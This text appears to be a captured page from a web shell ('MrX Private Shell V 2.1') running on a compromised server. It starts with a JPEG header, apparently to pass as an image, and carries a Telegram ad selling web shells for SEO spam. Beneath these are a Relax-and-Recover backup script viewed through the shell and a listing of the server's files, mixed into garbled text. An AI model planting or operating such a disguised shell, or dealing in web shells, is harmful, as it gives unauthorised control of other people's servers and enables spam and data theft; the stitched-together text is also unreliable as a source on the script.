����JFIF���������
__ __ __ __ _____ _ _ _____ _ _ _ | \/ | \ \ / / | __ \ (_) | | / ____| | | | | | \ / |_ __\ V / | |__) | __ ___ ____ _| |_ ___ | (___ | |__ ___| | | | |\/| | '__|> < | ___/ '__| \ \ / / _` | __/ _ \ \___ \| '_ \ / _ \ | | | | | | |_ / . \ | | | | | |\ V / (_| | || __/ ____) | | | | __/ | | |_| |_|_(_)_/ \_\ |_| |_| |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1 if you need WebShell for Seo everyday contact me on Telegram Telegram Address : @jackleetFor_More_Tools:
# Include utilities needed to get and set capabilities:
# Skip when the whole NETFS_RESTORE_CAPABILITIES array is empty.
# For the 'test' one must have all array members as a single word i.e. "${name[*]}" because
# the test should succeed when there is any non-empty array member, not necessarily the first one:
if ! test "${NETFS_RESTORE_CAPABILITIES[*]}" ; then
# Avoid a bug in the subsequent rescue/NETFS/default/600_store_NETFS_variables.sh script
# that would store a false NETFS_RESTORE_CAPABILITIES='()' into /etc/rear/rescue.conf
# when NETFS_RESTORE_CAPABILITIES=() but '()' is not an empty array but the string "()"
# cf. https://github.com/rear/rear/pull/1284#issuecomment-293246380
NETFS_RESTORE_CAPABILITIES=( 'No' )
return 0
fi
# Be backward compatible:
is_false "$NETFS_RESTORE_CAPABILITIES" && return 0
REQUIRED_PROGS+=( getcap setcap )
| Name | Type | Size | Permission | Actions |
|---|---|---|---|---|
| 200_include_getty.sh | File | 833 B | 0644 |
|
| 200_include_serial_console.sh | File | 5.96 KB | 0644 |
|
| 210_include_dhclient.sh | File | 6.72 KB | 0644 |
|
| 220_include_lvm_tools.sh | File | 587 B | 0644 |
|
| 230_include_md_tools.sh | File | 154 B | 0644 |
|
| 240_include_multipath_tools.sh | File | 578 B | 0644 |
|
| 280_include_systemd.sh | File | 1.48 KB | 0644 |
|
| 280_include_virtualbox.sh | File | 646 B | 0644 |
|
| 280_include_vmware_tools.sh | File | 394 B | 0644 |
|
| 290_include_drbd.sh | File | 280 B | 0644 |
|
| 300_check_backup_and_output_url.sh | File | 1.37 KB | 0644 |
|
| 300_include_grub_tools.sh | File | 2.76 KB | 0644 |
|
| 310_include_cap_utils.sh | File | 882 B | 0644 |
|
| 400_guess_kernel.sh | File | 6.64 KB | 0644 |
|
| 500_EFISTUB_check_kernel.sh | File | 1.14 KB | 0644 |
|